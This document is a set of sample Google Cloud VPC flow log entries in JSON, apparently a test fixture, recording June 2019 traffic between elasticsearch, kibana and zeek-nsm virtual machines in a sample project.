+{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"67.43.156.13","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"67.43.156.13","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"67.43.156.13","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"67.43.156.14","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"67.43.156.14","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"67.43.156.13","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
